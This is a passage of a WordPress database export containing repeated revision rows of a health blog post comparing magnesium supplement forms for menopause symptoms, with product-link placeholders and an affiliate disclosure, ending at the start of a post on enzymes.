\n\n\n\n

LINK TO PRODUCT

\n\n\n\n

Choosing the Best Magnesium for Menopause

\n\n\n\n

It\'s important to note that a balanced diet rich in magnesium-rich foods like leafy greens, nuts, and seeds is essential. Supplements should complement your diet rather than replace it.

\n\n\n\n

Conclusion

\n\n\n\n

Magnesium can be a valuable addition to your menopause management strategy, offering relief from common symptoms like hot flashes, mood swings, and sleep disturbances. When choosing a magnesium supplement, consider your specific symptoms and consult with a healthcare provider for personalized guidance. By making an informed choice, you can improve your overall well-being during this natural phase of life.

\n\n\n\n

\n\n\n\n

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you chose to sign up for a program or make a purchase using my link.

\n','Why Magnesium is Essential During the Menopause: Choosing the Right Supplement','','inherit','closed','closed','','5503-revision-v1','','','2023-09-19 14:04:38','2023-09-19 14:04:38','',5503,'https://tummyrevolution.com/?p=5626',0,'revision','',0),(5625,3,'2023-09-19 14:03:42','2023-09-19 14:03:42','\n

Menopause is a natural phase in a woman\'s life, signaling the end of her reproductive years. While it\'s a normal process, it can bring about a range of uncomfortable symptoms, including hot flashes, mood swings, and sleep disturbances. Many women turn to supplements to manage these symptoms, and one such supplement gaining popularity is magnesium. But with various forms of magnesium available, which one is best for menopause? In this blog, we\'ll explore the different types of magnesium and help you make an informed decision.

\n\n\n\n

Why Magnesium?
Magnesium is an essential mineral that plays a crucial role in hundreds of bodily functions, including muscle and nerve function, bone health, and heart rhythm maintenance. It\'s also believed to be beneficial for managing some menopausal symptoms.

\n\n\n\n

Types of Magnesium
Magnesium Oxide: This form is the least expensive but has low bioavailability, meaning your body absorbs less of it. It\'s often used as a laxative and may not be the best choice for menopausal symptoms.
Magnesium Citrate: This is a common form of magnesium found in supplements. It\'s well-absorbed and can help with muscle cramps and constipation. However, it may not be the most effective for menopause symptoms.
Magnesium Glycinate: This is a highly bioavailable form of magnesium, which means it\'s easily absorbed by the body. It\'s often recommended for menopausal women because of its calming effect on the nervous system, potentially aiding in mood swings and sleep disturbances.

\n\n\n\n

LINK TO PRODUKT

\n\n\n\n


Magnesium Malate: This form of magnesium is bound to malic acid and may be beneficial for those experiencing fatigue and muscle pain during menopause.

\n\n\n\n

LINK TO PRODUCT

\n\n\n\n


Magnesium L-threonate: This type of magnesium has gained attention for its potential cognitive benefits and may be helpful for menopausal women experiencing brain fog or memory issues.

\n\n\n\n

LINK TO PRODUCT

\n\n\n\n

Choosing the Best Magnesium for Menopause

\n\n\n\n

It\'s important to note that a balanced diet rich in magnesium-rich foods like leafy greens, nuts, and seeds is essential. Supplements should complement your diet rather than replace it.

\n\n\n\n

Conclusion

\n\n\n\n

Magnesium can be a valuable addition to your menopause management strategy, offering relief from common symptoms like hot flashes, mood swings, and sleep disturbances. When choosing a magnesium supplement, consider your specific symptoms and consult with a healthcare provider for personalized guidance. By making an informed choice, you can improve your overall well-being during this natural phase of life.

\n\n\n\n

\n\n\n\n

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you chose to sign up for a program or make a purchase using my link.

\n','Why Magnesium is Essential During the Menopause: Choosing the Right Supplement','','inherit','closed','closed','','5503-revision-v1','','','2023-09-19 14:03:42','2023-09-19 14:03:42','',5503,'https://tummyrevolution.com/?p=5625',0,'revision','',0),(5629,3,'2023-09-19 14:08:21','2023-09-19 14:08:21','\n

Menopause is a natural phase in a woman\'s life, signaling the end of her reproductive years. While it\'s a normal process, it can bring about a range of uncomfortable symptoms, including hot flashes, mood swings, and sleep disturbances. Many women turn to supplements to manage these symptoms, and one such supplement gaining popularity is magnesium. But with various forms of magnesium available, which one is best for menopause? In this blog, we\'ll explore the different types of magnesium and help you make an informed decision.

\n\n\n\n

Why Magnesium?
Magnesium is an essential mineral that plays a crucial role in hundreds of bodily functions, including muscle and nerve function, bone health, and heart rhythm maintenance. It\'s also believed to be beneficial for managing some menopausal symptoms.

\n\n\n\n

Types of Magnesium

\n\n\n\n

Magnesium Oxide: This form is the least expensive but has low bioavailability, meaning your body absorbs less of it. It\'s often used as a laxative and may not be the best choice for menopausal symptoms.
Magnesium Citrate: This is a common form of magnesium found in supplements. It\'s well-absorbed and can help with muscle cramps and constipation. However, it may not be the most effective for menopause symptoms.
Magnesium Glycinate: This is a highly bioavailable form of magnesium, which means it\'s easily absorbed by the body. It\'s often recommended for menopausal women because of its calming effect on the nervous system, potentially aiding in mood swings and sleep disturbances.

\n\n\n\n

LINK TO PRODUKT
Magnesium Malate: This form of magnesium is bound to malic acid and may be beneficial for those experiencing fatigue and muscle pain during menopause.

\n\n\n\n

LINK TO PRODUCT
Magnesium L-threonate: This type of magnesium has gained attention for its potential cognitive benefits and may be helpful for menopausal women experiencing brain fog or memory issues.

\n\n\n\n

LINK TO PRODUCT

\n\n\n\n

Choosing the Best Magnesium for Menopause

\n\n\n\n

It\'s important to note that a balanced diet rich in magnesium-rich foods like leafy greens, nuts, and seeds is essential. Supplements should complement your diet rather than replace it.

\n\n\n\n

Conclusion

\n\n\n\n

Magnesium can be a valuable addition to your menopause management strategy, offering relief from common symptoms like hot flashes, mood swings, and sleep disturbances. When choosing a magnesium supplement, consider your specific symptoms and consult with a healthcare provider for personalized guidance. By making an informed choice, you can improve your overall well-being during this natural phase of life.

\n\n\n\n

\n\n\n\n

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you chose to sign up for a program or make a purchase using my link.

\n','Why Magnesium is Essential During the Menopause: Choosing the Right Supplement','','inherit','closed','closed','','5503-revision-v1','','','2023-09-19 14:08:21','2023-09-19 14:08:21','',5503,'https://tummyrevolution.com/?p=5629',0,'revision','',0),(5627,3,'2023-09-19 14:05:30','2023-09-19 14:05:30','\n

Menopause is a natural phase in a woman\'s life, signaling the end of her reproductive years. While it\'s a normal process, it can bring about a range of uncomfortable symptoms, including hot flashes, mood swings, and sleep disturbances. Many women turn to supplements to manage these symptoms, and one such supplement gaining popularity is magnesium. But with various forms of magnesium available, which one is best for menopause? In this blog, we\'ll explore the different types of magnesium and help you make an informed decision.

\n\n\n\n

Why Magnesium?
Magnesium is an essential mineral that plays a crucial role in hundreds of bodily functions, including muscle and nerve function, bone health, and heart rhythm maintenance. It\'s also believed to be beneficial for managing some menopausal symptoms.

\n\n\n\n

Types of Magnesium

\n\n\n\n


Magnesium Oxide: This form is the least expensive but has low bioavailability, meaning your body absorbs less of it. It\'s often used as a laxative and may not be the best choice for menopausal symptoms.

\n\n\n\n


Magnesium Citrate: This is a common form of magnesium found in supplements. It\'s well-absorbed and can help with muscle cramps and constipation. However, it may not be the most effective for menopause symptoms.

\n\n\n\n


Magnesium Glycinate: This is a highly bioavailable form of magnesium, which means it\'s easily absorbed by the body. It\'s often recommended for menopausal women because of its calming effect on the nervous system, potentially aiding in mood swings and sleep disturbances.

\n\n\n\n

LINK TO PRODUKT

\n\n\n\n


Magnesium Malate: This form of magnesium is bound to malic acid and may be beneficial for those experiencing fatigue and muscle pain during menopause.

\n\n\n\n

\n\n\n\n

LINK TO PRODUCT

\n\n\n\n


Magnesium L-threonate: This type of magnesium has gained attention for its potential cognitive benefits and may be helpful for menopausal women experiencing brain fog or memory issues.

\n\n\n\n

LINK TO PRODUCT

\n\n\n\n

Choosing the Best Magnesium for Menopause

\n\n\n\n

It\'s important to note that a balanced diet rich in magnesium-rich foods like leafy greens, nuts, and seeds is essential. Supplements should complement your diet rather than replace it.

\n\n\n\n

Conclusion

\n\n\n\n

Magnesium can be a valuable addition to your menopause management strategy, offering relief from common symptoms like hot flashes, mood swings, and sleep disturbances. When choosing a magnesium supplement, consider your specific symptoms and consult with a healthcare provider for personalized guidance. By making an informed choice, you can improve your overall well-being during this natural phase of life.

\n\n\n\n

\n\n\n\n

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you chose to sign up for a program or make a purchase using my link.

\n','Why Magnesium is Essential During the Menopause: Choosing the Right Supplement','','inherit','closed','closed','','5503-revision-v1','','','2023-09-19 14:05:30','2023-09-19 14:05:30','',5503,'https://tummyrevolution.com/?p=5627',0,'revision','',0),(5628,3,'2023-09-19 14:06:15','2023-09-19 14:06:15','\n

Menopause is a natural phase in a woman\'s life, signaling the end of her reproductive years. While it\'s a normal process, it can bring about a range of uncomfortable symptoms, including hot flashes, mood swings, and sleep disturbances. Many women turn to supplements to manage these symptoms, and one such supplement gaining popularity is magnesium. But with various forms of magnesium available, which one is best for menopause? In this blog, we\'ll explore the different types of magnesium and help you make an informed decision.

\n\n\n\n

Why Magnesium?

\n\n\n\n


Magnesium is an essential mineral that plays a crucial role in hundreds of bodily functions, including muscle and nerve function, bone health, and heart rhythm maintenance. It\'s also believed to be beneficial for managing some menopausal symptoms.

\n\n\n\n

Types of Magnesium

\n\n\n\n


Magnesium Oxide: This form is the least expensive but has low bioavailability, meaning your body absorbs less of it. It\'s often used as a laxative and may not be the best choice for menopausal symptoms.

\n\n\n\n


Magnesium Citrate: This is a common form of magnesium found in supplements. It\'s well-absorbed and can help with muscle cramps and constipation. However, it may not be the most effective for menopause symptoms.

\n\n\n\n


Magnesium Glycinate: This is a highly bioavailable form of magnesium, which means it\'s easily absorbed by the body. It\'s often recommended for menopausal women because of its calming effect on the nervous system, potentially aiding in mood swings and sleep disturbances.

\n\n\n\n

LINK TO PRODUKT

\n\n\n\n


Magnesium Malate: This form of magnesium is bound to malic acid and may be beneficial for those experiencing fatigue and muscle pain during menopause.

\n\n\n\n

\n\n\n\n

LINK TO PRODUCT

\n\n\n\n


Magnesium L-threonate: This type of magnesium has gained attention for its potential cognitive benefits and may be helpful for menopausal women experiencing brain fog or memory issues.

\n\n\n\n

LINK TO PRODUCT

\n\n\n\n

Choosing the Best Magnesium for Menopause

\n\n\n\n

It\'s important to note that a balanced diet rich in magnesium-rich foods like leafy greens, nuts, and seeds is essential. Supplements should complement your diet rather than replace it.

\n\n\n\n

Conclusion

\n\n\n\n

Magnesium can be a valuable addition to your menopause management strategy, offering relief from common symptoms like hot flashes, mood swings, and sleep disturbances. When choosing a magnesium supplement, consider your specific symptoms and consult with a healthcare provider for personalized guidance. By making an informed choice, you can improve your overall well-being during this natural phase of life.

\n\n\n\n

\n\n\n\n

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you chose to sign up for a program or make a purchase using my link.

\n','Why Magnesium is Essential During the Menopause: Choosing the Right Supplement','','inherit','closed','closed','','5503-revision-v1','','','2023-09-19 14:06:15','2023-09-19 14:06:15','',5503,'https://tummyrevolution.com/?p=5628',0,'revision','',0),(5630,3,'2023-09-19 14:14:00','2023-09-19 14:14:00','\n

Menopause is a natural phase in a woman\'s life, signaling the end of her reproductive years. While it\'s a normal process, it can bring about a range of uncomfortable symptoms, including hot flashes, mood swings, and sleep disturbances. Many women turn to supplements to manage these symptoms, and one such supplement gaining popularity is magnesium. But with various forms of magnesium available, which one is best for menopause? In this blog, we\'ll explore the different types of magnesium and help you make an informed decision.

\n\n\n\n

Why Magnesium?
Magnesium is an essential mineral that plays a crucial role in hundreds of bodily functions, including muscle and nerve function, bone health, and heart rhythm maintenance. It\'s also believed to be beneficial for managing some menopausal symptoms.

\n\n\n\n

Types of Magnesium

\n\n\n\n

Magnesium Oxide: This form is the least expensive but has low bioavailability, meaning your body absorbs less of it. It\'s often used as a laxative and may not be the best choice for menopausal symptoms.
Magnesium Citrate: This is a common form of magnesium found in supplements. It\'s well-absorbed and can help with muscle cramps and constipation. However, it may not be the most effective for menopause symptoms.

\n\n\n\n

Magnesium Glycinate: This is a highly bioavailable form of magnesium, which means it\'s easily absorbed by the body. It\'s often recommended for menopausal women because of its calming effect on the nervous system, potentially aiding in mood swings and sleep disturbances.

\n\n\n\n

Link to product

\n\n\n\n


Magnesium Malate: This form of magnesium is bound to malic acid and may be beneficial for those experiencing fatigue and muscle pain during menopause.

\n\n\n\n

Link to product

\n\n\n\n


Magnesium L-threonate: This type of magnesium has gained attention for its potential cognitive benefits and may be helpful for menopausal women experiencing brain fog or memory issues.

\n\n\n\n

Link to product

\n\n\n\n

Choosing the Best Magnesium for Menopause

\n\n\n\n

It\'s important to note that a balanced diet rich in magnesium-rich foods like leafy greens, nuts, and seeds is essential. Supplements should complement your diet rather than replace it.

\n\n\n\n

Conclusion

\n\n\n\n

Magnesium can be a valuable addition to your menopause management strategy, offering relief from common symptoms like hot flashes, mood swings, and sleep disturbances. When choosing a magnesium supplement, consider your specific symptoms and consult with a healthcare provider for personalized guidance. By making an informed choice, you can improve your overall well-being during this natural phase of life.

\n\n\n\n

\n\n\n\n

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you chose to sign up for a program or make a purchase using my link.

\n','Why Magnesium is Essential During the Menopause: Choosing the Right Supplement','','inherit','closed','closed','','5503-revision-v1','','','2023-09-19 14:14:00','2023-09-19 14:14:00','',5503,'https://tummyrevolution.com/?p=5630',0,'revision','',0),(5631,3,'2023-09-19 14:14:52','2023-09-19 14:14:52','\n

Menopause is a natural phase in a woman\'s life, signaling the end of her reproductive years. While it\'s a normal process, it can bring about a range of uncomfortable symptoms, including hot flashes, mood swings, and sleep disturbances. Many women turn to supplements to manage these symptoms, and one such supplement gaining popularity is magnesium. But with various forms of magnesium available, which one is best for menopause? In this blog, we\'ll explore the different types of magnesium and help you make an informed decision.

\n\n\n\n

Why Magnesium?
Magnesium is an essential mineral that plays a crucial role in hundreds of bodily functions, including muscle and nerve function, bone health, and heart rhythm maintenance. It\'s also believed to be beneficial for managing some menopausal symptoms.

\n\n\n\n

Types of Magnesium

\n\n\n\n

Magnesium Oxide: This form is the least expensive but has low bioavailability, meaning your body absorbs less of it. It\'s often used as a laxative and may not be the best choice for menopausal symptoms.

\n\n\n\n


Magnesium Citrate: This is a common form of magnesium found in supplements. It\'s well-absorbed and can help with muscle cramps and constipation. However, it may not be the most effective for menopause symptoms.

\n\n\n\n

Magnesium Glycinate: This is a highly bioavailable form of magnesium, which means it\'s easily absorbed by the body. It\'s often recommended for menopausal women because of its calming effect on the nervous system, potentially aiding in mood swings and sleep disturbances.

\n\n\n\n

Link to product

\n\n\n\n


Magnesium Malate: This form of magnesium is bound to malic acid and may be beneficial for those experiencing fatigue and muscle pain during menopause.

\n\n\n\n

Link to product

\n\n\n\n


Magnesium L-threonate: This type of magnesium has gained attention for its potential cognitive benefits and may be helpful for menopausal women experiencing brain fog or memory issues.

\n\n\n\n

Link to product

\n\n\n\n

Choosing the Best Magnesium for Menopause

\n\n\n\n

It\'s important to note that a balanced diet rich in magnesium-rich foods like leafy greens, nuts, and seeds is essential. Supplements should complement your diet rather than replace it.

\n\n\n\n

Conclusion

\n\n\n\n

Magnesium can be a valuable addition to your menopause management strategy, offering relief from common symptoms like hot flashes, mood swings, and sleep disturbances. When choosing a magnesium supplement, consider your specific symptoms and consult with a healthcare provider for personalized guidance. By making an informed choice, you can improve your overall well-being during this natural phase of life.

\n\n\n\n

\n\n\n\n

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you chose to sign up for a program or make a purchase using my link.

\n','Why Magnesium is Essential During the Menopause: Choosing the Right Supplement','','inherit','closed','closed','','5503-revision-v1','','','2023-09-19 14:14:52','2023-09-19 14:14:52','',5503,'https://tummyrevolution.com/?p=5631',0,'revision','',0),(5635,3,'2023-09-19 14:18:30','2023-09-19 14:18:30','\n

Menopause is a natural phase in a woman\'s life, signaling the end of her reproductive years. While it\'s a normal process, it can bring about a range of uncomfortable symptoms, including hot flashes, mood swings, and sleep disturbances. Many women turn to supplements to manage these symptoms, and one such supplement gaining popularity is magnesium. But with various forms of magnesium available, which one is best for menopause? In this blog, we\'ll explore the different types of magnesium and help you make an informed decision.

\n\n\n\n

\n\n\n\n

Why Magnesium?
Magnesium is an essential mineral that plays a crucial role in hundreds of bodily functions, including muscle and nerve function, bone health, and heart rhythm maintenance. It\'s also believed to be beneficial for managing some menopausal symptoms.

\n\n\n\n

Types of Magnesium

\n\n\n\n

Magnesium Oxide: This form is the least expensive but has low bioavailability, meaning your body absorbs less of it. It\'s often used as a laxative and may not be the best choice for menopausal symptoms.
Magnesium Citrate: This is a common form of magnesium found in supplements. It\'s well-absorbed and can help with muscle cramps and constipation. However, it may not be the most effective for menopause symptoms.

\n\n\n\n

\n\n\n\n

Magnesium Glycinate: This is a highly bioavailable form of magnesium, which means it\'s easily absorbed by the body. It\'s often recommended for menopausal women because of its calming effect on the nervous system, potentially aiding in mood swings and sleep disturbances.

\n\n\n\n

Link to product
Magnesium Malate: This form of magnesium is bound to malic acid and may be beneficial for those experiencing fatigue and muscle pain during menopause.

\n\n\n\n

Link to product
Magnesium L-threonate: This type of magnesium has gained attention for its potential cognitive benefits and may be helpful for menopausal women experiencing brain fog or memory issues.

\n\n\n\n

Link to product

\n\n\n\n

Choosing the Best Magnesium for Menopause

\n\n\n\n

It\'s important to note that a balanced diet rich in magnesium-rich foods like leafy greens, nuts, and seeds is essential. Supplements should complement your diet rather than replace it.

\n\n\n\n

Conclusion

\n\n\n\n

Magnesium can be a valuable addition to your menopause management strategy, offering relief from common symptoms like hot flashes, mood swings, and sleep disturbances. When choosing a magnesium supplement, consider your specific symptoms and consult with a healthcare provider for personalized guidance. By making an informed choice, you can improve your overall well-being during this natural phase of life.

\n\n\n\n

\n\n\n\n

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you chose to sign up for a program or make a purchase using my link.

\n','Why Magnesium is Essential During the Menopause: Choosing the Right Supplement','','inherit','closed','closed','','5503-revision-v1','','','2023-09-19 14:18:30','2023-09-19 14:18:30','',5503,'https://tummyrevolution.com/?p=5635',0,'revision','',0),(5632,3,'2023-09-19 14:15:35','2023-09-19 14:15:35','\n

Menopause is a natural phase in a woman\'s life, signaling the end of her reproductive years. While it\'s a normal process, it can bring about a range of uncomfortable symptoms, including hot flashes, mood swings, and sleep disturbances. Many women turn to supplements to manage these symptoms, and one such supplement gaining popularity is magnesium. But with various forms of magnesium available, which one is best for menopause? In this blog, we\'ll explore the different types of magnesium and help you make an informed decision.

\n\n\n\n

Why Magnesium?
Magnesium is an essential mineral that plays a crucial role in hundreds of bodily functions, including muscle and nerve function, bone health, and heart rhythm maintenance. It\'s also believed to be beneficial for managing some menopausal symptoms.

\n\n\n\n

\n\n\n\n

Types of Magnesium

\n\n\n\n

Magnesium Oxide: This form is the least expensive but has low bioavailability, meaning your body absorbs less of it. It\'s often used as a laxative and may not be the best choice for menopausal symptoms.

\n\n\n\n


Magnesium Citrate: This is a common form of magnesium found in supplements. It\'s well-absorbed and can help with muscle cramps and constipation. However, it may not be the most effective for menopause symptoms.

\n\n\n\n

Magnesium Glycinate: This is a highly bioavailable form of magnesium, which means it\'s easily absorbed by the body. It\'s often recommended for menopausal women because of its calming effect on the nervous system, potentially aiding in mood swings and sleep disturbances.

\n\n\n\n

Link to product

\n\n\n\n


Magnesium Malate: This form of magnesium is bound to malic acid and may be beneficial for those experiencing fatigue and muscle pain during menopause.

\n\n\n\n

Link to product

\n\n\n\n


Magnesium L-threonate: This type of magnesium has gained attention for its potential cognitive benefits and may be helpful for menopausal women experiencing brain fog or memory issues.

\n\n\n\n

Link to product

\n\n\n\n

Choosing the Best Magnesium for Menopause

\n\n\n\n

It\'s important to note that a balanced diet rich in magnesium-rich foods like leafy greens, nuts, and seeds is essential. Supplements should complement your diet rather than replace it.

\n\n\n\n

Conclusion

\n\n\n\n

Magnesium can be a valuable addition to your menopause management strategy, offering relief from common symptoms like hot flashes, mood swings, and sleep disturbances. When choosing a magnesium supplement, consider your specific symptoms and consult with a healthcare provider for personalized guidance. By making an informed choice, you can improve your overall well-being during this natural phase of life.

\n\n\n\n

\n\n\n\n

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you chose to sign up for a program or make a purchase using my link.

\n','Why Magnesium is Essential During the Menopause: Choosing the Right Supplement','','inherit','closed','closed','','5503-revision-v1','','','2023-09-19 14:15:35','2023-09-19 14:15:35','',5503,'https://tummyrevolution.com/?p=5632',0,'revision','',0),(5634,3,'2023-09-19 14:17:37','2023-09-19 14:17:37','\n

Menopause is a natural phase in a woman\'s life, signaling the end of her reproductive years. While it\'s a normal process, it can bring about a range of uncomfortable symptoms, including hot flashes, mood swings, and sleep disturbances. Many women turn to supplements to manage these symptoms, and one such supplement gaining popularity is magnesium. But with various forms of magnesium available, which one is best for menopause? In this blog, we\'ll explore the different types of magnesium and help you make an informed decision.

\n\n\n\n

\n\n\n\n

Why Magnesium?
Magnesium is an essential mineral that plays a crucial role in hundreds of bodily functions, including muscle and nerve function, bone health, and heart rhythm maintenance. It\'s also believed to be beneficial for managing some menopausal symptoms.

\n\n\n\n

Types of Magnesium

\n\n\n\n

Magnesium Oxide: This form is the least expensive but has low bioavailability, meaning your body absorbs less of it. It\'s often used as a laxative and may not be the best choice for menopausal symptoms.
Magnesium Citrate: This is a common form of magnesium found in supplements. It\'s well-absorbed and can help with muscle cramps and constipation. However, it may not be the most effective for menopause symptoms.

\n\n\n\n

\n\n\n\n

Magnesium Glycinate: This is a highly bioavailable form of magnesium, which means it\'s easily absorbed by the body. It\'s often recommended for menopausal women because of its calming effect on the nervous system, potentially aiding in mood swings and sleep disturbances.

\n\n\n\n

Link to product

\n\n\n\n


Magnesium Malate: This form of magnesium is bound to malic acid and may be beneficial for those experiencing fatigue and muscle pain during menopause.

\n\n\n\n

Link to product

\n\n\n\n


Magnesium L-threonate: This type of magnesium has gained attention for its potential cognitive benefits and may be helpful for menopausal women experiencing brain fog or memory issues.

\n\n\n\n

Link to product

\n\n\n\n

Choosing the Best Magnesium for Menopause

\n\n\n\n

It\'s important to note that a balanced diet rich in magnesium-rich foods like leafy greens, nuts, and seeds is essential. Supplements should complement your diet rather than replace it.

\n\n\n\n

Conclusion

\n\n\n\n

Magnesium can be a valuable addition to your menopause management strategy, offering relief from common symptoms like hot flashes, mood swings, and sleep disturbances. When choosing a magnesium supplement, consider your specific symptoms and consult with a healthcare provider for personalized guidance. By making an informed choice, you can improve your overall well-being during this natural phase of life.

\n\n\n\n

\n\n\n\n

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you chose to sign up for a program or make a purchase using my link.

\n','Why Magnesium is Essential During the Menopause: Choosing the Right Supplement','','inherit','closed','closed','','5503-revision-v1','','','2023-09-19 14:17:37','2023-09-19 14:17:37','',5503,'https://tummyrevolution.com/?p=5634',0,'revision','',0),(5633,3,'2023-09-19 14:16:36','2023-09-19 14:16:36','\n

Menopause is a natural phase in a woman\'s life, signaling the end of her reproductive years. While it\'s a normal process, it can bring about a range of uncomfortable symptoms, including hot flashes, mood swings, and sleep disturbances. Many women turn to supplements to manage these symptoms, and one such supplement gaining popularity is magnesium. But with various forms of magnesium available, which one is best for menopause? In this blog, we\'ll explore the different types of magnesium and help you make an informed decision.

\n\n\n\n

\n\n\n\n

Why Magnesium?
Magnesium is an essential mineral that plays a crucial role in hundreds of bodily functions, including muscle and nerve function, bone health, and heart rhythm maintenance. It\'s also believed to be beneficial for managing some menopausal symptoms.

\n\n\n\n

\n\n\n\n

Types of Magnesium

\n\n\n\n

Magnesium Oxide: This form is the least expensive but has low bioavailability, meaning your body absorbs less of it. It\'s often used as a laxative and may not be the best choice for menopausal symptoms.

\n\n\n\n


Magnesium Citrate: This is a common form of magnesium found in supplements. It\'s well-absorbed and can help with muscle cramps and constipation. However, it may not be the most effective for menopause symptoms.

\n\n\n\n

Magnesium Glycinate: This is a highly bioavailable form of magnesium, which means it\'s easily absorbed by the body. It\'s often recommended for menopausal women because of its calming effect on the nervous system, potentially aiding in mood swings and sleep disturbances.

\n\n\n\n

Link to product

\n\n\n\n


Magnesium Malate: This form of magnesium is bound to malic acid and may be beneficial for those experiencing fatigue and muscle pain during menopause.

\n\n\n\n

Link to product

\n\n\n\n


Magnesium L-threonate: This type of magnesium has gained attention for its potential cognitive benefits and may be helpful for menopausal women experiencing brain fog or memory issues.

\n\n\n\n

Link to product

\n\n\n\n

Choosing the Best Magnesium for Menopause

\n\n\n\n

It\'s important to note that a balanced diet rich in magnesium-rich foods like leafy greens, nuts, and seeds is essential. Supplements should complement your diet rather than replace it.

\n\n\n\n

Conclusion

\n\n\n\n

Magnesium can be a valuable addition to your menopause management strategy, offering relief from common symptoms like hot flashes, mood swings, and sleep disturbances. When choosing a magnesium supplement, consider your specific symptoms and consult with a healthcare provider for personalized guidance. By making an informed choice, you can improve your overall well-being during this natural phase of life.

\n\n\n\n

\n\n\n\n

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you chose to sign up for a program or make a purchase using my link.

\n','Why Magnesium is Essential During the Menopause: Choosing the Right Supplement','','inherit','closed','closed','','5503-revision-v1','','','2023-09-19 14:16:36','2023-09-19 14:16:36','',5503,'https://tummyrevolution.com/?p=5633',0,'revision','',0),(5636,3,'2023-09-19 14:20:14','2023-09-19 14:20:14','\n

Menopause is a natural phase in a woman\'s life, signaling the end of her reproductive years. While it\'s a normal process, it can bring about a range of uncomfortable symptoms, including hot flashes, mood swings, and sleep disturbances. Many women turn to supplements to manage these symptoms, and one such supplement gaining popularity is magnesium. But with various forms of magnesium available, which one is best for menopause? In this blog, we\'ll explore the different types of magnesium and help you make an informed decision.

\n\n\n\n

\n\n\n\n

Why Magnesium?
Magnesium is an essential mineral that plays a crucial role in hundreds of bodily functions, including muscle and nerve function, bone health, and heart rhythm maintenance. It\'s also believed to be beneficial for managing some menopausal symptoms.

\n\n\n\n

Types of Magnesium

\n\n\n\n

Magnesium Oxide: This form is the least expensive but has low bioavailability, meaning your body absorbs less of it. It\'s often used as a laxative and may not be the best choice for menopausal symptoms.
Magnesium Citrate: This is a common form of magnesium found in supplements. It\'s well-absorbed and can help with muscle cramps and constipation. However, it may not be the most effective for menopause symptoms.

\n\n\n\n

Link to product

\n\n\n\n

Magnesium Glycinate: This is a highly bioavailable form of magnesium, which means it\'s easily absorbed by the body. It\'s often recommended for menopausal women because of its calming effect on the nervous system, potentially aiding in mood swings and sleep disturbances.

\n\n\n\n

Link to product
Magnesium Malate: This form of magnesium is bound to malic acid and may be beneficial for those experiencing fatigue and muscle pain during menopause.

\n\n\n\n

Link to product
Magnesium L-threonate: This type of magnesium has gained attention for its potential cognitive benefits and may be helpful for menopausal women experiencing brain fog or memory issues.

\n\n\n\n

\n\n\n\n

Choosing the Best Magnesium for Menopause

\n\n\n\n

It\'s important to note that a balanced diet rich in magnesium-rich foods like leafy greens, nuts, and seeds is essential. Supplements should complement your diet rather than replace it.

\n\n\n\n

Conclusion

\n\n\n\n

Magnesium can be a valuable addition to your menopause management strategy, offering relief from common symptoms like hot flashes, mood swings, and sleep disturbances. When choosing a magnesium supplement, consider your specific symptoms and consult with a healthcare provider for personalized guidance. By making an informed choice, you can improve your overall well-being during this natural phase of life.

\n\n\n\n

\n\n\n\n

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you chose to sign up for a program or make a purchase using my link.

\n','Why Magnesium is Essential During the Menopause: Choosing the Right Supplement','','inherit','closed','closed','','5503-revision-v1','','','2023-09-19 14:20:14','2023-09-19 14:20:14','',5503,'https://tummyrevolution.com/?p=5636',0,'revision','',0),(5637,3,'2023-09-19 14:21:03','2023-09-19 14:21:03','\n

Menopause is a natural phase in a woman\'s life, signaling the end of her reproductive years. While it\'s a normal process, it can bring about a range of uncomfortable symptoms, including hot flashes, mood swings, and sleep disturbances. Many women turn to supplements to manage these symptoms, and one such supplement gaining popularity is magnesium. But with various forms of magnesium available, which one is best for menopause? In this blog, we\'ll explore the different types of magnesium and help you make an informed decision.

\n\n\n\n

\n\n\n\n

Why Magnesium?
Magnesium is an essential mineral that plays a crucial role in hundreds of bodily functions, including muscle and nerve function, bone health, and heart rhythm maintenance. It\'s also believed to be beneficial for managing some menopausal symptoms.

\n\n\n\n

Types of Magnesium

\n\n\n\n

Magnesium Oxide: This form is the least expensive but has low bioavailability, meaning your body absorbs less of it. It\'s often used as a laxative and may not be the best choice for menopausal symptoms.
Magnesium Citrate: This is a common form of magnesium found in supplements. It\'s well-absorbed and can help with muscle cramps and constipation. However, it may not be the most effective for menopause symptoms.

\n\n\n\n

Link to product

\n\n\n\n

Magnesium Glycinate: This is a highly bioavailable form of magnesium, which means it\'s easily absorbed by the body. It\'s often recommended for menopausal women because of its calming effect on the nervous system, potentially aiding in mood swings and sleep disturbances.

\n\n\n\n

Link to product
Magnesium Malate: This form of magnesium is bound to malic acid and may be beneficial for those experiencing fatigue and muscle pain during menopause.

\n\n\n\n

Link to product
Magnesium L-threonate: This type of magnesium has gained attention for its potential cognitive benefits and may be helpful for menopausal women experiencing brain fog or memory issues.

\n\n\n\n

\n\n\n\n

Choosing the Best Magnesium for Menopause

\n\n\n\n

It\'s important to note that a balanced diet rich in magnesium-rich foods like leafy greens, nuts, and seeds is essential. Supplements should complement your diet rather than replace it.

\n\n\n\n

Conclusion

\n\n\n\n

Magnesium can be a valuable addition to your menopause management strategy, offering relief from common symptoms like hot flashes, mood swings, and sleep disturbances. When choosing a magnesium supplement, consider your specific symptoms and consult with a healthcare provider for personalized guidance. By making an informed choice, you can improve your overall well-being during this natural phase of life.

\n\n\n\n

\n\n\n\n

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you chose to sign up for a program or make a purchase using my link.

\n','Why Magnesium is Essential During the Menopause: Choosing the Right Supplement','','inherit','closed','closed','','5503-revision-v1','','','2023-09-19 14:21:03','2023-09-19 14:21:03','',5503,'https://tummyrevolution.com/?p=5637',0,'revision','',0),(5639,1,'2023-09-19 17:59:02','2023-09-19 17:59:02','\n
\n

Enzymes might sound like complex chemical compounds, but they are actually tiny molecular machines that play a pivotal role in our bodies and the natural world. Often referred to as the \"catalysts of life,\" enzymes are essential for a multitude of biochemical processes that keep our bodies functioning smoothly. In this article, we\'ll delve into the fascinating world of enzymes, understanding what they are and why they are so crucial for our well-being.

\n\n\n\n

What Are Enzymes?

\n\n\n\n

